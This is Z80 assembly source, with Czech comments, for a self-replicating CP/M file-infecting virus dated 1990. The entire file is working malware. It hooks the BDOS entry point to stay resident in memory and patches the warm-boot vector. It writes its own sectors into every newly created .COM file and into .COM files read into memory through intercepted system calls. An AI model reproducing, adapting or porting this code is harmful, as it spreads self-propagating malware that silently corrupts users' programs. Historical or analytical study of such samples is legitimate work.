	.z80
;##################################
;###	    CP/M virus		###
;##################################
; CP/M virus Copyright (c) 1990 Pavel BRYCHTA
;		Version 1.0
false	equ	0
true	equ	NOT false
VS	equ	5		; virus je velky 5 sektoru
remove	equ	false		; jestli se virus ma dat odinstalovat pri Wboot

; Zaciname zjistovanim pritomnosti viru v pameti
start:	ld	c,0ffh		; BDOS funkce 255
	ld	l,80h		; testovaci hodnota
	call	5		; zavolame BDOS (test aktivity viru)
	cp	7fh		; virus vraci invertovanou hodnotu
	jr	nz,vins		; virus neni v pameti - musime ho instalovat
; zjistili jsme, ze virus je jiz aktivni v pameti pocitace - pouze presuneme program
	jp	(hl)		; spustime MovTPA proceduru ve viru
; virus se nenachazi v pameti - musime ho instalovat
vins:	xor	a
	ld	(fflg),a	; mazeme vlajku osetrovani souboru
	ld	hl,(6)		; adresa vstupu do BDOSu
	ld	(bdexe+1),hl	; ulozime take skutecnou adresu BDOSu
	ld	(BDcal+1),hl	;  dtto
	ld	(V0+1),hl
	ld	(V1+1),hl
	ld	(V2+1),hl
	ld	(V4+1),hl
	ld	(V30+1),hl
	ld	(bdex1+1),hl
	if	NOT remove
	ld	(V3+1),hl
	endif
	ld	bc,-803h	; posun na druhy vstup CCP
	add	hl,bc
	if	NOT remove
	ld	(ccp+1),hl	; ulozime adresu
	endif
	ld	bc,-(Vsize+3+3)	; posun na prvni adresu viru
	add	hl,bc		; HL ukazuje na skutecnou adresu viru
	ld	(hl),0c3h	; ulozime instrukci skoku na virus
	ld	(6),hl		; ulozime take novou adresu "BDOSu"
	ex	de,hl		; adresa do DE
	ld	hl,MovTPA-start+3; posun na sluzbu MovTPA virusu
	add	hl,de		; skutecna adresa sluzby MovTPA ve viru
	ld	(MTAdr+1),hl	; ulozime skutecnou adresu sluzby
	ld	hl,Wrk-start+3	; posun na zacatek pracovni oblasti
	add	hl,de		; spocteme si adresu prac. oblasti
	ld	(Vir+2),hl	; ulozime skutecnou adresu prac. oblasti
	if	NOT remove
	ld	hl,SysRS-start+3; posun na Virus Warm boot
	add	hl,de		; posuneme se
	push	hl		; uschovame adresu noveho Warm bootu
	pop	bc		; do BC
	ld	hl,(1)		; puvodni adresa
	inc	hl		; na adresu operandu
	ld	(hl),c		; LSB
	inc	hl
	ld	(hl),b		; MSB
	endif
	ld	hl,Vir-start+3	; vezmeme posun na skutecny zacatek viru
	add	hl,de		; skutecna adresa startu viru
	ex	de,hl		; adresa do HL
	inc	hl		; za JP instrukci
	ld	(hl),e		; ulozime LSB adresy
	inc	hl
	ld	(hl),d		; ulozime MSB adresy
	inc	hl		; ukazujeme na pocatek oblasti viru
	ld	(VSa+1),hl	; ulozime pocatecni adresu viru
	ld	(VSa1+1),hl
	ld	(VSa2+1),hl
	ex	de,hl		; jako cilova adresa
	ld	hl,100h		; odkud brat
	ld	bc,Vsize	; jak je virus dlouhy
	ldir			; presuneme virus
	ld	c,0ffh		; funkce viru
	call	5		; volame "BDOS"
	jp	(hl)		; provedeme MovTPA ve viru
; Prenos TPA na adresu 100h a start .COM programu
MovTPA:	ld	bc,(6)		; vstup do viru
	dec	b		; delka je o 100h mene
	ld	hl,100h+(80h*VS); odkud
	ld	de,100h		; kam
	ldir			; presuneme TPA
	jp	100h		; startujeme .COM soubor
	if	NOT remove
; Virus Open file
OpFil:	bit	7,(ix+2)	; test na aktivni "osetrovani" .COM souboru
	jr	nz,bdex1	; osetrovani je aktivni - nemuzeme delat vsechno
	ld	hl,9		; posun na .EXT
	add	hl,de		; adresa .EXT
	ld	b,7fh		; maska atributu
	ld	a,(hl)		; znak z ext
	and	b		; maskujeme atributy
	cp	'C'		; je to .COM soubor ?
	jr	nz,bdex1	; neni - primo provedeme BDOS a vracime se
	inc	hl		; dalsi znak
	ld	a,(hl)		; znak z .ext
	and	b		; maskujeme atributy
	cp	'O'		; je to COM soubor ?
	jr	nz,bdex1	; neni - primo provedeme BDOS a vratime se
	inc	hl		; posledni znak
	ld	a,(hl)		; znak z .ext
	and	b		; maskujeme atributy
	cp	'M'		; je to .COM soubor ?
	jr	nz,bdex1	; neni
; Je funkce Open na soubor, ktery ma priponu .COM
	push	de
	pop	hl		; ukazatel na jmeno v FCB do HL
	inc	hl		; ukazatel za jmeno disku
	ld	b,8		; pocet znaku jmena
	xor	a		; inicializujeme soucet
chknam:	add	a,(hl)		; pripocteme znak
	inc	hl		; dalsi znak
	djnz	chknam		; pocitame kontrolni slovo jmena
	ld	(ix+3),a	; ulozime kontrolni slovo
bdex1:	jp	0000		; pokracujeme dale pres BDOS
OpFi0:	jr	OpFil
; Virus Read Sequential
RdSeq:	ld	hl,9		; posun na .EXT
	add	hl,de		; adresa .EXT
	ld	b,7fh		; maska atributu
	ld	a,(hl)		; znak z ext
	and	b		; maskujeme atributy
	cp	'C'		; je to .COM soubor ?
	jr	nz,bdex1	; neni - primo provedeme BDOS a vracime se
	inc	hl		; dalsi znak
	ld	a,(hl)		; znak z .ext
	and	b		; maskujeme atributy
	cp	'O'		; je to COM soubor ?
	jr	nz,bdex1	; neni - primo provedeme BDOS a vratime se
	inc	hl		; posledni znak
	ld	a,(hl)		; znak z .ext
	and	b		; maskujeme atributy
	cp	'M'		; je to .COM soubor ?
	jr	nz,bdex1	; neni
; Je funkce Read na soubor, ktery ma priponu .COM
	push	de
	pop	hl		; ukazatel na jmeno v FCB do HL
	inc	hl		; ukazatel za jmeno disku
	ld	b,8		; pocet znaku jmena
	xor	a		; inicializujeme soucet
chkn:	add	a,(hl)		; pripocteme znak
	inc	hl		; dalsi znak
	djnz	chkn		; pocitame kontrolni slovo jmena
	cp	(ix+3)		; shoduje se se zadanym ?
	jr	nz,bdex1	; neshoduje - pokracujeme
	bit	7,(ix+2)	; uz jsme soubor osetrovali, nebo to je poprve?
	jr	nz,next		; uz jsme ho osetrovali
; provadi se prvni cteni ze .COM souboru
	ld	a,(ix+1)	; vyssi byte DMA adresy
	or	a		; test na >100h
	jr	z,ncp		; neprenasime virus
	dec	a		; test na 100h (TPA)
	jr	nz,copy		; DMA>100h
ncp:	inc	(ix+3)		; kontrolni soucet aby nesouhlasil
	jr	bdex1		; provedeme normalne BDOS
copy:	push	ix		; uschovame ukazatel na promenne
	push	de		; ukazatel na FCB
V4:	call	0000h		; provedeme BDOS Read Sequential
	pop	de		; ukazatel na FCB
	pop	ix		; ukazatel na promenne
	or	a		; test na chybu
	ret	nz		; cteni selhalo
	push	de		; FCB
VSa:	ld	hl,0000		; pocatecni adresa viru
	ld	e,(ix+0)	; LSB DMA
	ld	d,(ix+1)	; MSB DMA
	ld	b,10		; pocet porovnavani
vck:	ld	a,(de)		; byte z DMA zony
	cp	(hl)		; shoduje se s virem ?
	jr	nz,Vckf		; neshoduje - prenasime virus
	inc	hl
	inc	de		; ukazatele
	djnz	vck		; cely test viru ?
; virus se jiz v programu nachazi - nedelame nic
	pop	de		; adres FCB
	inc	(ix+3)		; kontrolni slovo nesedi
	xor	a		; cteni probehlo ok.
	ret			; koncime
RdSe0:	jr	RdSeq
OpFi1:	jr	OpFi0
Vckf:	pop	de		; adresa FCB
	push	de
	pop	iy		; adresa FCB do IY
	ld	(iy+32),0	; RC opravime o precteny record
VSa1:	ld	hl,0000		; pocatecni adresa viru
	ld	(ix+4),VS-1	; pocet sektoru viru
	push	de		; FCB
	ld	e,(ix+0)	; LSB DMA
	ld	d,(ix+1)	; MSB DMA
	ld	bc,128		; delka sektoru viru
	ldir			; preneseme sektor viru
	pop	de		; FCB
	ld	(ix+5),l	; adresa
	ld	(ix+6),h	; LSB+MSB
	set	7,(ix+2)	; oznacime osetrovani viru
	xor	a		; oznacime dobry konec operace
	ret			; navrat
; prenasime nasledujici sektor z viru do programu
next:	push	de		; FCB
	ld	e,(ix+0)	; LSB DMA
	ld	d,(ix+1)	; MSB DMA
	ld	bc,128		; delka sektoru viru
	ld	l,(ix+5)	; LSB
	ld	h,(ix+6)	; MSB adresa presunu viru
	ldir			; preneseme sektor viru
	pop	de		; FCB
	ld	(ix+5),l	; adresa
	ld	(ix+6),h	; LSB+MSB
	xor	a		; oznacime dobry konec operace
	dec	(ix+4)		; citac sektoru
	ret	nz		; konec - jeste nebyl posledni sektor
	ld	(ix+2),0	; rusime osetrovani souboru
	dec	(ix+3)		; kontrolni soucet nesedi
	ret			; koncime
; pozadavek na Warm Boot pres Bios
SysRS:	ld	c,0		; system reset fce.
; Vlastni virus - provadeni kontroly funkci BDOSu
Vir:	ld	ix,0000		; ukazatel na pracovni prostor viru
	ld	a,c		; pozadovane cislo sluzby BDOSu
	if	NOT remove
	cp	0		; test na "System reset"
	jr	z,SysRS0	; ano - system reset Fce
	endif
	cp	22		; test na "Make file"
	jr	z,MakFil	; ano - Make file Fce
	cp	0ffh		; test na virus test funkci
	jr	z,VirRet	; ano -provedeme funkci identifikace viru
	cp	26		; test na "SETDMA" funkce
	jr	z,SetDM0	; ano - je SetDMA
	cp	15		; test na "open file"
	jr	z,OpFi1		; je open file
	cp	20		; test na "Read sequential"
	jr	z,RdSe0		; je Read sequential
bdexe:	jp	0000h		; provedeni "opravdoveho BDOSu"
; "Make file" function
MakFil:	ld	hl,9		; posun na .EXT
	add	hl,de		; adresa .EXT
	ld	b,7fh		; maska atributu
	ld	a,(hl)		; znak z ext
	and	b		; maskujeme atributy
	cp	'C'		; je to .COM soubor ?
	jr	nz,bdexe	; neni - primo provedeme BDOS a vracime se
	inc	hl		; dalsi znak
	ld	a,(hl)		; znak z .ext
	and	b		; maskujeme atributy
	cp	'O'		; je to COM soubor ?
	jr	nz,bdexe	; neni - primo provedeme BDOS a vratime se
	inc	hl		; posledni znak
	ld	a,(hl)		; znak z .ext
	and	b		; maskujeme atributy
	cp	'M'		; je to .COM soubor ?
	jr	nz,bdexe	; neni
; Jedna se o zrizovani .COM souboru - poridime ho a zapiseme do nej virus
	push	de		; ukazatel na FCB
BDcal:	call	0000h		; provedeni "opravdoveho BDOSu"
	pop	de		; ukazatel zpatky
	cp	0ffh		; test na chybu
	ret	z		; chyba - soubor nelze zridit
	push	af		; uschovame si originalni navratovy parametr
; Soubor byl zrizen - zapiseme do nej virus
	push	de		; ukazatel na FCB
VSa2:	ld	de,0000		; pocatecni adresa viru
	ld	b,VS		; pocitadlo sektoru viru, ktere musime zapsat
VWloop:	push	de		; DMA
	push	bc		; citac sektoru
	ld	c,26		; set DMA funkce
V0:	call	0000h		; execute BDOS
	pop	bc		; citac sektoru
	pop	de		; DMA
	ld	hl,128		; posun na dalsi sektor
	add	hl,de		; HL je nova adresa DMA
	pop	de		; adresa na FCB
	push	de		; FCB
	push	hl		; DMA
	push	bc		; citac
	ld	c,21		; write sequential
V1:	call	0000h		; zapiseme sektor viru do souboru
	pop	bc		; citac
	pop	de		; DMA
	or	a		; test na chybu
	jr	nz,VWerr	; chyba psani viru na disk
	djnz	VWloop		; zapiseme zbytek viru
	pop	de		; adresa FCB
VWspol:	ld	c,38		; neimplementovana funkce
	call	5		; slepe volani BDOSu (nastavi IX)
	ld	e,(ix+0)	; LSB puvodniho DMA
	ld	d,(ix+1)	; MSB puvodniho DMA
	ld	c,26		; SetDMA funkce
V2:	call	0000h		; nastavime puvodni DMA
	pop	af		; navratovy parametr
	ret			; ok
SysRS0:	jr	SysRST
SetDM0:	jr	SetDMA
; Nepodarilo se zapsat virus
VWerr:	pop	de		; adresa FCB
	pop	af		; navratovy parametr
	ld	a,0ffh		; nastavime ho jako, ze nelze zridit soubor
	push	af		; ulozime ho do zasobniku
	jr	VWspol		; pokracujeme
; Indikace pritomnosti viru v systemu
VirRet:	ld	a,l		; LSB z registru L
	ld	l,10		; verze viru
	cpl			; invertujeme vysledek
MTAdr:	ld	hl,MovTPA	; adresa presunu TPA ve viru
	ret			; koncime
; Virus System RESET funkce
SysRST:	ld	sp,6ch		; lokalni zasobnik
	ld	(ix+2),0	; mazeme vlajku ovladani .COM souboru
	ld	c,13		; reset disk system funkce
V3:	call	0000h		; pres BDOS
	ld	a,(4)		; current disk
	ld	c,a		; ulozime ho pro CCP
ccp:	jp	0000h		; jump to CCP warm start
	endif
; Virus SetDMA funkce
SetDMA:	ld	(ix+0),e	; LSB adresy DMA
	ld	(IX+1),d	; MSB adresy DMA
V30:	jp	0000h		; provedeme BDOS
; Work area viru (pres IX registr)
Wrk:
VDMA:	defw	0		; IX+0,1 DMA adresa
fflg:	defb	0		; IX+2 vlajka ovladani zapisu .COM souboru
	defb	0		; IX+3 kontrolni soucet souboru
	defb	0		; IX+4 pocitadlo zapsanych sektoru viru
	defw	0		; IX+5,6 adresa zapisovani nasledujiciho sektoru
Vsize	equ	$-start
	end
